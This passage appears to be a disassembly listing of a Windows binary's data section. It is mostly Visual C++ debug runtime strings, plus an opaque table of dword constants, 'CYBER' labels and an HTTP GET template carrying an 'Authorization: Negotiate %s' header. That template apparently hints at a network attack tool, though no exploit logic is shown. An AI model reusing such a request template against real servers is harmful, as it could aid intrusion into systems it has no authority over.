dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
aCyber db 'CYBER',0 ; DATA XREF: sub_401CC7+3476�o
; sub_401CC7+3566�o ...
align 4
aCyber_0 db 'CYBER',0 ; DATA XREF: sub_401CC7+3896�o
; sub_401CC7+38CC�o ...
align 4
; char aGetHttp1_0Host[]
aGetHttp1_0Host db 'GET / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_40DA4E+68�o
db 'Host: %s',0Dh,0Ah
db 'Authorization: Negotiate %s',0Dh,0Ah
db 0Dh,0Ah,0
align 4
dbl_43C468 dq 1.388888888888889e-2 ; DATA XREF: sub_40D88B+2F�r
dbl_43C470 dq 1.666666666666667e-1 ; DATA XREF: sub_40D88B+15�r
dbl_43C478 dq 1.333333333333333 ; DATA XREF: sub_40D8D7+70�r
dword_43C480 dd 0FFFFFFFFh ; DATA XREF: sub_40DCEB+13�r
; sub_40DD68�r ...
dword_43C484 dd 0 ; DATA XREF: sub_40E04F�o
flt_43C488 dd 5.0e-1 ; DATA XREF: sub_40E3C7+39B�r
align 10h
dbl_43C490 dq 9.765625e-4 ; DATA XREF: sub_416F62+2BD�r
; sub_416F62+2D8�r ...
dbl_43C498 dq -1.52587890625e-4 ; DATA XREF: sub_418650+3E5�r
dbl_43C4A0 dq 3.0517578125e-4 ; DATA XREF: sub_418650+3C5�r
dbl_43C4A8 dq -3.0517578125e-4 ; DATA XREF: sub_418650+342�r
; sub_418650+3A7�r
dbl_43C4B0 dq 1.52587890625e-4 ; DATA XREF: sub_418650+271�r
dbl_43C4B8 dq -1.739501953125e-3 ; DATA XREF: sub_418650+24B�r
; sub_418650+2D5�r ...
dbl_43C4C0 dq 3.11279296875e-3 ; DATA XREF: sub_418650+E1�r
dbl_43C4C8 dq 3.0517578125e-5 ; DATA XREF: sub_418650+AE�r
; sub_418650+138�r ...
dbl_43C4D0 dq 6.103515625e-5 ; DATA XREF: sub_418650+93�r
; sub_418650+308�r
dbl_43C4D8 dq 2.288818359375e-3 ; DATA XREF: sub_418650+21�r
dbl_43C4E0 dq -3.0517578125e-5 ; DATA XREF: sub_419551+2B�r
flt_43C4E8 dd 9.765625e-4 ; DATA XREF: sub_41B3B5+1B0�r
flt_43C4EC dd 8.0 ; DATA XREF: sub_41B3B5+1AA�r
flt_43C4F0 dd 0.0 ; DATA XREF: sub_41B3B5+171�r
flt_43C4F4 dd 1.0e-3 ; DATA XREF: sub_41B3B5+168�r
aFclose_c db 'fclose.c',0 ; DATA XREF: _fclose+1D�o
; __fclose_lk+25�o
align 4
; char aStreamNull[]
aStreamNull db 'stream != NULL',0 ; DATA XREF: _fclose+14�o _fseek+D�o ...
align 4
; char aStrNull[]
aStrNull db 'str != NULL',0 ; DATA XREF: __fclose_lk+1C�o
; sub_41F210+45�o ...
aClient db 'Client',0 ; DATA XREF: .data:00451910�o
align 4
aIgnore db 'Ignore',0 ; DATA XREF: .data:0045190C�o
align 10h
aCrt db 'CRT',0 ; DATA XREF: .data:00451908�o
aNormal_0 db 'Normal',0 ; DATA XREF: .data:00451904�o
align 4
aFree db 'Free',0 ; DATA XREF: .data:off_451900�o
align 8
dword_43C548 dd 0FFFFFFFFh, 0 ; DATA XREF: __nh_malloc_dbg+5�o
dd offset sub_41C17D
aErrorMemoryAll db 'Error: memory allocation: bad memory block type.',0Ah,0
; DATA XREF: __heap_alloc_dbg:loc_41C34A�o
; _realloc_help:loc_41C7D0�o
align 4
; char aInvalidAllocat[]
aInvalidAllocat db 'Invalid allocation size: %u bytes.',0Ah,0
; DATA XREF: __heap_alloc_dbg+11B�o
; char aS_32[]
aS_32 db '%s',0 ; DATA XREF: __heap_alloc_dbg+BC�o
; __heap_alloc_dbg+16F�o ...
align 10h
aClientHookAl_0 db 'Client hook allocation failure.',0Ah,0
; DATA XREF: __heap_alloc_dbg:loc_41C297�o
align 4
; char aClientHookAllo[]
aClientHookAllo db 'Client hook allocation failure at file %hs line %d.',0Ah,0
; DATA XREF: __heap_alloc_dbg+94�o
align 4
aDbgheap_c db 'dbgheap.c',0 ; DATA XREF: __heap_alloc_dbg+31�o
; _realloc_help+77�o ...
align 4
; char a_crtcheckmemor[]
a_crtcheckmemor db '_CrtCheckMemory()',0 ; DATA XREF: __heap_alloc_dbg+25�o
; _realloc_help+6B�o ...
align 10h
dword_43C630 dd 0FFFFFFFFh, 0 ; DATA XREF: __realloc_dbg+5�o
dd offset sub_41C623
; char a_pfirstblockPo[]
a_pfirstblockPo db '_pFirstBlock == pOldBlock',0 ; DATA XREF: _realloc_help+499�o
align 4
; char a_plastblockPol[]
a_plastblockPol db '_pLastBlock == pOldBlock',0 ; DATA XREF: _realloc_help+445�o
align 4
; char aFreallocFreall[]
aFreallocFreall db 'fRealloc || (!fRealloc && pNewBlock == pOldBlock)',0
; DATA XREF: _realloc_help:loc_41CA36�o
align 4
; char a_block_typePol[]
a_block_typePol db '_BLOCK_TYPE(pOldBlock->nBlockUse)==_BLOCK_TYPE(nBlockUse)',0
; DATA XREF: _realloc_help+277�o
align 4
; char aPoldblockNline[]
aPoldblockNline db 'pOldBlock->nLine == IGNORE_LINE && pOldBlock->lRequest == IGNORE_'
; DATA XREF: _realloc_help:loc_41C861�o
db 'REQ',0
align 4
; char a_crtisvalidhea[]
a_crtisvalidhea db '_CrtIsValidHeapPointer(pUserData)',0 ; DATA XREF: _realloc_help+1B6�o
; sub_41CCE0+A8�o ...
align 10h
; char aAllocationTooL[]
aAllocationTooL db 'Allocation too large or negative: %u bytes.',0Ah,0
; DATA XREF: _realloc_help+136�o
align 10h
aClientHookRe_0 db 'Client hook re-allocation failure.',0Ah,0
; DATA XREF: _realloc_help:loc_41C74F�o
; char aClientHookReAl[]
aClientHookReAl db 'Client hook re-allocation failure at file %hs line %d.',0Ah,0
; DATA XREF: _realloc_help+DC�o
align 10h
dword_43C7E0 dd 0FFFFFFFFh, 0 ; DATA XREF: __expand_dbg+5�o
dd offset sub_41CC03
align 10h
dword_43C7F0 dd 0FFFFFFFFh, 0 ; DATA XREF: __free_dbg+5�o
dd offset sub_41CCC2
; char a_pfirstblockPh[]
a_pfirstblockPh db '_pFirstBlock == pHead',0 ; DATA XREF: sub_41CCE0+35D�o
align 4
; char a_plastblockPhe[]
a_plastblockPhe db '_pLastBlock == pHead',0 ; DATA XREF: sub_41CCE0+307�o
align 4
; char aPheadNblockuse[]
aPheadNblockuse db 'pHead->nBlockUse == nBlockUse',0 ; DATA XREF: sub_41CCE0+29C�o
; sub_41D0F0+133�o
align 4
; char aPheadNlineIgno[]
aPheadNlineIgno db 'pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ',0
; DATA XREF: sub_41CCE0:loc_41CF04�o
align 4
; char aDamageAfterHsB[]
aDamageAfterHsB db 'DAMAGE: after %hs block (#%d) at 0x%08X.',0Ah,0
; DATA XREF: sub_41CCE0+1E5�o
; sub_41D430+265�o
align 4
; char aDamageBeforeHs[]
aDamageBeforeHs db 'DAMAGE: before %hs block (#%d) at 0x%08X.',0Ah,0
; DATA XREF: sub_41CCE0+17F�o
; sub_41D430+208�o
align 4
; char a_block_type_is[]
a_block_type_is db '_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)',0 ; DATA XREF: sub_41CCE0+10A�o
; sub_41D0F0+E2�o ...
align 4
aClientHookFree db 'Client hook free failure.',0Ah,0 ; DATA XREF: sub_41CCE0:loc_41CD4D�o
align 4
dword_43C928 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41D0F0+5�o
dd offset sub_41D261
align 8
dword_43C938 dd 0FFFFFFFFh, 0 ; DATA XREF: __CrtSetDbgBlockType+5�o
dd offset sub_41D35D
; char aMemoryCheckErr[]
aMemoryCheckErr db 'memory check error at 0x%08X = 0x%02X, should be 0x%02X.',0Ah,0
; DATA XREF: _CheckBytes+54�o
align 10h
; char aHsLocatedAt0x0[]
aHsLocatedAt0x0 db '%hs located at 0x%08X is %u bytes long.',0Ah,0
; DATA XREF: sub_41D430+33A�o
align 4
; char aHsAllocatedAtF[]
aHsAllocatedAtF db '%hs allocated at file %hs(%d).',0Ah,0 ; DATA XREF: sub_41D430+307�o
; char aDamageOnTopOfF[]
aDamageOnTopOfF db 'DAMAGE: on top of Free block at 0x%08X.',0Ah,0
; DATA XREF: sub_41D430+2BE�o
align 4
aDamaged db 'DAMAGED',0 ; DATA XREF: sub_41D430:loc_41D604�o
a_heapchkFail_3 db '_heapchk fails with unknown return value!',0Ah,0
; DATA XREF: sub_41D430:loc_41D55C�o
align 4
a_heapchkFail_2 db '_heapchk fails with _HEAPBADPTR.',0Ah,0
; DATA XREF: sub_41D430:loc_41D534�o
align 10h
a_heapchkFail_1 db '_heapchk fails with _HEAPBADEND.',0Ah,0
; DATA XREF: sub_41D430:loc_41D50C�o
align 4
a_heapchkFail_0 db '_heapchk fails with _HEAPBADNODE.',0Ah,0
; DATA XREF: sub_41D430:loc_41D4E4�o
align 4
a_heapchkFailsW db '_heapchk fails with _HEAPBADBEGIN.',0Ah,0
; DATA XREF: sub_41D430:loc_41D4B9�o
align 10h
dword_43CAC0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41D430+5�o
dd offset sub_41D7A5
align 10h
dword_43CAD0 dd 0FFFFFFFFh, 0 ; DATA XREF: __CrtDoForAllClientObjects+5�o
dd offset sub_41D89D
align 10h
dword_43CAE0 dd 0FFFFFFFFh, 0 ; DATA XREF: __CrtIsMemoryBlock+5�o
dd offset sub_41DB46
; char aBadMemoryBlock[]
aBadMemoryBlock db 'Bad memory block found at 0x%08X.',0Ah,0 ; DATA XREF: sub_41DB90+13C�o
align 10h
a_crtmemcheckpo db '_CrtMemCheckPoint: NULL state pointer.',0Ah,0
; DATA XREF: sub_41DB90:loc_41DBB9�o
dword_43CB38 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41DB90+5�o
dd offset sub_41DD18
a_crtmemdiffere db '_CrtMemDifference: NULL state pointer.',0Ah,0
; DATA XREF: __CrtMemDifference:loc_41DD62�o
aObjectDumpComp db 'Object dump complete.',0Ah,0
; DATA XREF: __CrtMemDumpAllObjectsSince:loc_41E12C�o
align 4
; char aCrtBlockAt0x08[]
aCrtBlockAt0x08 db 'crt block at 0x%08X, subtype %x, %u bytes long.',0Ah,0
; DATA XREF: __CrtMemDumpAllObjectsSince+271�o
align 4
; char aNormalBlockAt0[]
aNormalBlockAt0 db 'normal block at 0x%08X, %u bytes long.',0Ah,0
; DATA XREF: __CrtMemDumpAllObjectsSince+214�o
; char aClientBlockAt0[]
aClientBlockAt0 db 'client block at 0x%08X, subtype %x, %u bytes long.',0Ah,0
; DATA XREF: __CrtMemDumpAllObjectsSince+1A9�o
; char aLd[]
aLd db '{%ld} ',0 ; DATA XREF: __CrtMemDumpAllObjectsSince+15A�o
align 4
; char aHsD[]
aHsD db '%hs(%d) : ',0 ; DATA XREF: __CrtMemDumpAllObjectsSince+132�o
align 4
; char aFileErrorD[]
aFileErrorD db '#File Error#(%d) : ',0 ; DATA XREF: __CrtMemDumpAllObjectsSince+101�o
aDumpingObjects db 'Dumping objects ->',0Ah,0
; DATA XREF: __CrtMemDumpAllObjectsSince:loc_41DEAB�o
dword_43CC50 dd 0FFFFFFFFh, 0 ; DATA XREF: __CrtMemDumpAllObjectsSince+5�o
dd offset sub_41E121
; char aDataSS[]
aDataSS db ' Data: <%s> %s',0Ah,0 ; DATA XREF: __printMemBlockData+EC�o
; char a_2x[]
a_2x db '%.2X ',0 ; DATA XREF: __printMemBlockData+BF�o
align 4
aDetectedMemory db 'Detected memory leaks!',0Ah,0
; DATA XREF: __CrtDumpMemoryLeaks:loc_41E2C4�o
; char aTotalAllocatio[]
aTotalAllocatio db 'Total allocations: %ld bytes.',0Ah,0
; DATA XREF: __CrtMemDumpStatistics+9D�o
align 4
; char aLargestNumberU[]
aLargestNumberU db 'Largest number used: %ld bytes.',0Ah,0
; DATA XREF: __CrtMemDumpStatistics+75�o
align 10h
; char aLdBytesInLdHsB[]
aLdBytesInLdHsB db '%ld bytes in %ld %hs Blocks.',0Ah,0
; DATA XREF: __CrtMemDumpStatistics+4B�o
align 10h
; char aMode_t0[]
aMode_t0 db '*mode != _T(',27h,'\0',27h,')',0 ; DATA XREF: __fsopen+95�o
align 4
; char aModeNull[]
aModeNull db 'mode != NULL',0 ; DATA XREF: __fsopen+67�o
; __openfile+4F�o
align 4
; char aFile_t0[]
aFile_t0 db '*file != _T(',27h,'\0',27h,')',0 ; DATA XREF: __fsopen+3D�o
align 4
aFopen_c db 'fopen.c',0 ; DATA XREF: __fsopen+18�o __fsopen+46�o ...
; char aFileNull[]
aFileNull db 'file != NULL',0 ; DATA XREF: __fsopen+F�o
align 10h
; char aFormatNull[]
aFormatNull db 'format != NULL',0 ; DATA XREF: _sprintf+45�o
; __snprintf+45�o ...
align 10h
aSprintf_c db 'sprintf.c',0 ; DATA XREF: _sprintf+24�o _sprintf+4E�o ...
align 4
; char aStringNull[]
aStringNull db 'string != NULL',0 ; DATA XREF: _sprintf+1B�o
; __snprintf+1B�o ...
align 4
aFgets_c db 'fgets.c',0 ; DATA XREF: sub_41F210+24�o
; sub_41F210+4E�o
aFprintf_c db 'fprintf.c',0 ; DATA XREF: _fprintf+1E�o _fprintf+48�o
align 10h
aVsprintf_c db 'vsprintf.c',0 ; DATA XREF: __vsnprintf+1E�o
; __vsnprintf+48�o
align 4
aSscanf_c db 'sscanf.c',0 ; DATA XREF: _sscanf+24�o _sscanf+4E�o
align 4
dbl_43CD98 dq 1.0 ; DATA XREF: _floor+99�r _ceil+99�r ...
aDbgdel_cpp db 'dbgdel.cpp',0 ; DATA XREF: operator delete(void *)+62�o
align 4
aOnexit_c db 'onexit.c',0 ; DATA XREF: __onexit+2E�o
; ___onexitinit+8�o
align 4
aFseek_c db 'fseek.c',0 ; DATA XREF: _fseek+16�o __fseek_lk+19�o
aStrupr_c db 'strupr.c',0 ; DATA XREF: __strupr+133�o
align 4
aMbstowcs_c db 'mbstowcs.c',0 ; DATA XREF: __mbstowcs_lk+32�o
align 4
; char aSNull[]
aSNull db 's != NULL',0 ; DATA XREF: __mbstowcs_lk+29�o
align 8
dword_43CDE8 dd 0FFFFFFFFh ; DATA XREF: start+5�o
dd offset sub_422492
dd offset sub_4224AD
a_file_c db '_file.c',0 ; DATA XREF: ___initstdio+31�o
; ___initstdio+65�o
aAssertionFai_1 db 'Assertion Failed',0 ; DATA XREF: .data:00451BFC�o
align 10h
aError db 'Error',0 ; DATA XREF: .data:00451BF8�o
align 4
aWarning db 'Warning',0 ; DATA XREF: .data:off_451BF4�o
; char aSDS_0[]
aSDS_0 db '%s(%d) : %s',0 ; DATA XREF: __CrtDbgReport+1FF�o
; char asc_43CE2C[]
asc_43CE2C: ; DATA XREF: __CrtDbgReport:loc_422A46�o
dw 0Ah
unicode 0, <>,0
; char asc_43CE30[]
asc_43CE30: ; DATA XREF: __CrtDbgReport+1C2�o
dw 0Dh
unicode 0, <>,0
aAssertionFai_0 db 'Assertion failed!',0 ; DATA XREF: __CrtDbgReport:loc_4229E5�o
align 4
aAssertionFaile db 'Assertion failed: ',0 ; DATA XREF: __CrtDbgReport+169�o
align 4
; char a_crtdbgreportS[]
a_crtdbgreportS db '_CrtDbgReport: String too long or IO Error',0
; DATA XREF: __CrtDbgReport+149�o
; __CrtDbgReport+21C�o ...
align 4
aSecondChanceAs db 'Second Chance Assertion Failed: File %s, Line %d',0Ah,0
; DATA XREF: __CrtDbgReport+E6�o
align 4
aWsprintfa db 'wsprintfA',0 ; DATA XREF: __CrtDbgReport+B6�o
align 4
aUser32_dll_0 db 'user32.dll',0 ; DATA XREF: __CrtDbgReport+9C�o
; ___crtMessageBoxA+16�o
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Debug Library',0
; DATA XREF: _CrtMessageWindow+2C2�o
align 4
; char aDebugSProgramS[]
aDebugSProgramS db 'Debug %s!',0Ah ; DATA XREF: _CrtMessageWindow+28C�o
db 0Ah
db 'Program: %s%s%s%s%s%s%s%s%s%s%s',0Ah
db 0Ah
db '(Press Retry to debug the application)',0
align 4
aModule db 0Ah ; DATA XREF: _CrtMessageWindow+221�o
db 'Module: ',0
align 4
aFile_1 db 0Ah ; DATA XREF: _CrtMessageWindow+1E1�o
db 'File: ',0
aLine db 0Ah ; DATA XREF: _CrtMessageWindow+1AA�o
db 'Line: ',0
; char asc_43CF68[]
asc_43CF68 db 0Ah ; DATA XREF: _CrtMessageWindow+173�o
; __NMSG_WRITE+171�o
db 0Ah,0
align 4
aExpression db 'Expression: ',0 ; DATA XREF: _CrtMessageWindow+153�o
align 4
dword_43CF7C dd 0 ; DATA XREF: _CrtMessageWindow:loc_422D1A�o
; _CrtMessageWindow:loc_422D39�o ...
aForInformation db 0Ah ; DATA XREF: _CrtMessageWindow+10E�o
db 0Ah
db 'For information on how your program can cause an assertion',0Ah
db 'failure, see the Visual C++ documentation on asserts.',0
align 4
; char a___[]
a___ db '...',0 ; DATA XREF: _CrtMessageWindow+9C�o
; _CrtMessageWindow+F4�o ...
; char aProgramNameUnk[]
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: _CrtMessageWindow+56�o
; __NMSG_WRITE+ED�o
align 10h
aDbgrpt_c db 'dbgrpt.c',0 ; DATA XREF: _CrtMessageWindow+1F�o
align 4
; char aSzusermessageN[]
aSzusermessageN db 'szUserMessage != NULL',0 ; DATA XREF: _CrtMessageWindow+13�o
align 4
a_freebuf_c db '_freebuf.c',0 ; DATA XREF: __freebuf+15�o
align 10h
aMlock_c db 'mlock.c',0 ; DATA XREF: __lock+16�o
dword_43D048 dd 0FFFFFFFFh, 0 ; DATA XREF: __heap_alloc_base+5�o
dd offset sub_423785
dd 0FFFFFFFFh, 0
dd offset sub_423807
dword_43D060 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_423880+5�o
dd offset sub_423921
dd 0FFFFFFFFh, 0
dd offset sub_423A1A
dword_43D078 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_423A90+5�o
dd offset sub_423C58
dd 0FFFFFFFFh, 0
dd offset sub_423E6F
dword_43D090 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_423F30+5�o
dd offset sub_423FAB
dd 0FFFFFFFFh, 0
dd offset sub_42402D
dword_43D0A8 dd 0FFFFFFFFh, 0 ; DATA XREF: unknown_libname_6+5�o
dd offset sub_4240E2
dd 0FFFFFFFFh, 0
dd offset sub_424127
; char Str1[]
Str1 db '__GLOBAL_HEAP_SELECTED',0 ; DATA XREF: sub_426EF0+B9�o
align 4
a__msvcrt_heap_ db '__MSVCRT_HEAP_SELECT',0 ; DATA XREF: sub_426EF0+5A�o
align 10h
a_filbuf_c db '_filbuf.c',0 ; DATA XREF: __filbuf+18�o
align 4
a_open_c db '_open.c',0 ; DATA XREF: __openfile+2E�o
; __openfile+58�o ...
; char aFilenameNull[]
aFilenameNull db 'filename != NULL',0 ; DATA XREF: __openfile+25�o
align 4
aStream_c db 'stream.c',0 ; DATA XREF: __getstream+C1�o
align 4
; char aInconsistentIo[]
aInconsistentIo db '("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)',0
; DATA XREF: __flsbuf+162�o
align 4
a_flsbuf_c db '_flsbuf.c',0 ; DATA XREF: __flsbuf+18�o
; __flsbuf+16E�o
align 10h
byte_43D170 db 6 ; DATA XREF: unknown_libname_7+8F�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
db 8,'`h````',0
dd 78707000h, 8787878h, 807h, 8080007h, 8000008h, 7000800h
dd 8
aNull_0: ; DATA XREF: .data:off_453F10�o
unicode 0, <(null)>,0
align 4
aNull db '(null)',0 ; DATA XREF: .data:off_453F0C�o
align 4
aOutput_c db 'output.c',0 ; DATA XREF: unknown_libname_7+122�o
align 10h
; char aCh_t0[]
aCh_t0 db 'ch != _T(',27h,'\0',27h,')',0 ; DATA XREF: unknown_libname_7+116�o
align 10h
aTidtable_c db 'tidtable.c',0 ; DATA XREF: __mtinit+23�o __getptd+29�o
align 4
a_sftbuf_c db '_sftbuf.c',0 ; DATA XREF: __stbuf+18�o __stbuf+B2�o ...
align 4
; char aFlag0Flag1[]
aFlag0Flag1 db 'flag == 0 || flag == 1',0 ; DATA XREF: __ftbuf+13�o
align 10h
aInput_c db 'input.c',0 ; DATA XREF: unknown_libname_11+1E�o
; unknown_libname_11+4B�o
a_yn db '_yn',0 ; DATA XREF: .data:0045425C�o
a_y1 db '_y1',0 ; DATA XREF: .data:00454254�o
a_y0 db '_y0',0 ; DATA XREF: .data:0045424C�o
aFrexp db 'frexp',0 ; DATA XREF: .data:00454244�o
align 4
aFmod db 'fmod',0 ; DATA XREF: .data:0045423C�o
align 4
a_hypot db '_hypot',0 ; DATA XREF: .data:00454234�o
align 4
a_cabs db '_cabs',0 ; DATA XREF: .data:0045422C�o
align 4
aLdexp db 'ldexp',0 ; DATA XREF: .data:00454224�o
align 4
aModf db 'modf',0 ; DATA XREF: .data:0045421C�o
align 4
aFabs db 'fabs',0 ; DATA XREF: .data:00454214�o
align 4
aFloor db 'floor',0 ; DATA XREF: .data:0045420C�o
align 4
aCeil db 'ceil',0 ; DATA XREF: .data:00454204�o
align 4
aTan db 'tan',0 ; DATA XREF: .data:004541FC�o
aCos db 'cos',0 ; DATA XREF: .data:004541F4�o
aSin db 'sin',0 ; DATA XREF: .data:004541EC�o
aSqrt db 'sqrt',0 ; DATA XREF: .data:004541E4�o
align 10h
aAtan2 db 'atan2',0 ; DATA XREF: .data:004541DC�o
align 4
aAtan db 'atan',0 ; DATA XREF: .data:004541D4�o
align 10h
aAcos db 'acos',0 ; DATA XREF: .data:004541CC�o
align 4
aAsin db 'asin',0 ; DATA XREF: .data:004541C4�o
align 10h
aTanh db 'tanh',0 ; DATA XREF: .data:004541BC�o
align 4
aCosh db 'cosh',0 ; DATA XREF: .data:004541B4�o
align 10h
aSinh db 'sinh',0 ; DATA XREF: .data:004541AC�o
align 4
aLog10 db 'log10',0 ; DATA XREF: .data:004541A4�o
align 10h
aLog_0 db 'log',0 ; DATA XREF: .data:0045419C�o
aPow db 'pow',0 ; DATA XREF: .data:00454194�o
aExp db 'exp',0 ; DATA XREF: .data:off_45418C�o
align 10h
dbl_43D2F0 dq 0.0 ; DATA XREF: __handle_exc+D7�r
; __handle_exc+11A�r ...
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: __ms_p5_mp_test_fdiv+1A�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: __ms_p5_mp_test_fdiv+6�o
align 10h
; char aE000[]
aE000 db 'e+000',0 ; DATA XREF: __cftoe2:loc_42C9E8�o
align 4
dword_43D328 dd 0FFFFFFFFh ; DATA XREF: ___FrameUnwindToState+5�o
dd offset loc_42D419
dd offset loc_42D426
align 8
dword_43D338 dd 0FFFFFFFFh, 0 ; DATA XREF: CallCatchBlock(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,_s_FuncInfo const *,void *,int,ulong)+5�o
dd offset sub_42D64D
align 8
dd offset loc_42D60E
dd offset loc_42D61B
dword_43D350 dd 0FFFFFFFFh ; DATA XREF: BuildCatchObject(EHExceptionRecord *,EHRegistrationNode *,_s_HandlerType const *,_s_CatchableType const *)+5�o
dd offset loc_42D96C
dd offset loc_42D972
align 10h
dword_43D360 dd 0FFFFFFFFh ; DATA XREF: _DestructExceptionObject(EHExceptionRecord *,uchar)+5�o
dd offset loc_42D9EE
dd offset loc_42D9FD
align 10h
dword_43D370 dd 0FFFFFFFFh, 0 ; DATA XREF: terminate(void)+5�o
dd offset j__abort
align 10h
dd offset loc_42DB10
dd offset loc_42DB16
dword_43D388 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_42DB70+5�o
dd offset j_?terminate@@YAXXZ ; terminate(void)
align 8
dd offset loc_42DBBC
dd offset loc_42DBC2
aLc_time db 'LC_TIME',0 ; DATA XREF: .data:0045440C�o
aLc_numeric db 'LC_NUMERIC',0 ; DATA XREF: .data:00454400�o
align 4
aLc_monetary db 'LC_MONETARY',0 ; DATA XREF: .data:004543F4�o
aLc_ctype db 'LC_CTYPE',0 ; DATA XREF: .data:004543E8�o
align 4
aLc_collate db 'LC_COLLATE',0 ; DATA XREF: .data:004543DC�o
align 4
aLc_all db 'LC_ALL',0 ; DATA XREF: .data:off_4543D0�o
align 10h
; char asc_43D3E0[]
asc_43D3E0 db ';',0 ; DATA XREF: _setlocale:loc_42DEA3�o
; __setlocale_get_all+83�o
align 4
asc_43D3E4 db '=;',0 ; DATA XREF: _setlocale:loc_42DDD1�o
align 4
aSetlocal_c db 'setlocal.c',0 ; DATA XREF: __setlocale_set_cat+3E�o
; __setlocale_get_all+1B�o
align 4
asc_43D3F4: ; DATA XREF: __setlocale_get_all+5B�o
unicode 0, <=>,0
; char Control[]
Control db '_.,',0 ; DATA XREF: ___lc_strtolc:loc_42E5E2�o
; char a__4[]
a__4: ; DATA XREF: ___lc_lctostr+50�o
; ___init_numeric:loc_43474B�o
unicode 0, <.>,0
a__5: ; DATA XREF: ___lc_lctostr+25�o
unicode 0, <_>,0
aFtell_c db 'ftell.c',0 ; DATA XREF: _ftell+16�o __ftell_lk+18�o
dword_43D40C dd 0 ; DATA XREF: ___crtLCMapStringA+5D�o
; ___crtGetStringTypeA+58�o ...
dword_43D410 dd 2 dup(0) ; DATA XREF: ___crtLCMapStringA+35�o
; ___crtGetStringTypeA+35�o ...
dword_43D418 dd 0FFFFFFFFh ; DATA XREF: ___crtLCMapStringA+5�o
dd offset loc_42EFF6
dd offset loc_42EFFC
dd 0FFFFFFFFh
dd offset loc_42F0EC
dd offset loc_42F0F2
aStdenvp_c db 'stdenvp.c',0 ; DATA XREF: __setenvp+5B�o
; __setenvp+D0�o
align 4
aStdargv_c db 'stdargv.c',0 ; DATA XREF: __setargv+72�o
align 4
aA_env_c db 'a_env.c',0 ; DATA XREF: ___crtGetEnvironmentStringsA+E8�o
; ___crtGetEnvironmentStringsA+1C6�o
aIoinit_c db 'ioinit.c',0 ; DATA XREF: __ioinit+B�o __ioinit+106�o
align 4
aRuntimeError db 'runtime error ',0 ; DATA XREF: .data:00454554�o
align 4
asc_43D46C db 0Dh,0Ah,0 ; DATA XREF: .data:0045454C�o
align 10h
aTlossError db 'TLOSS error',0Dh,0Ah,0 ; DATA XREF: .data:00454544�o
align 10h
aSingError db 'SING error',0Dh,0Ah,0 ; DATA XREF: .data:0045453C�o
align 10h
aDomainError db 'DOMAIN error',0Dh,0Ah,0 ; DATA XREF: .data:00454534�o
align 10h
aR6028UnableToI db 'R6028',0Dh,0Ah ; DATA XREF: .data:0045452C�o
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah ; DATA XREF: .data:00454524�o
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 10h
aR6026NotEnough db 'R6026',0Dh,0Ah ; DATA XREF: .data:0045451C�o
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah ; DATA XREF: .data:00454514�o
db '- pure virtual function call',0Dh,0Ah,0
align 10h
aR6024NotEnough db 'R6024',0Dh,0Ah ; DATA XREF: .data:0045450C�o
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah ; DATA XREF: .data:00454504�o
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah ; DATA XREF: .data:004544FC�o
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah ; DATA XREF: .data:004544F4�o
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah ; DATA XREF: .data:004544EC�o
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah ; DATA XREF: .data:004544E4�o
db 'abnormal program termination',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah ; DATA XREF: .data:004544DC�o
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah ; DATA XREF: .data:004544D4�o
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_4544CC�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVis_0 db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: __NMSG_WRITE+1A4�o
align 10h
; char aRuntimeErrorPr[]
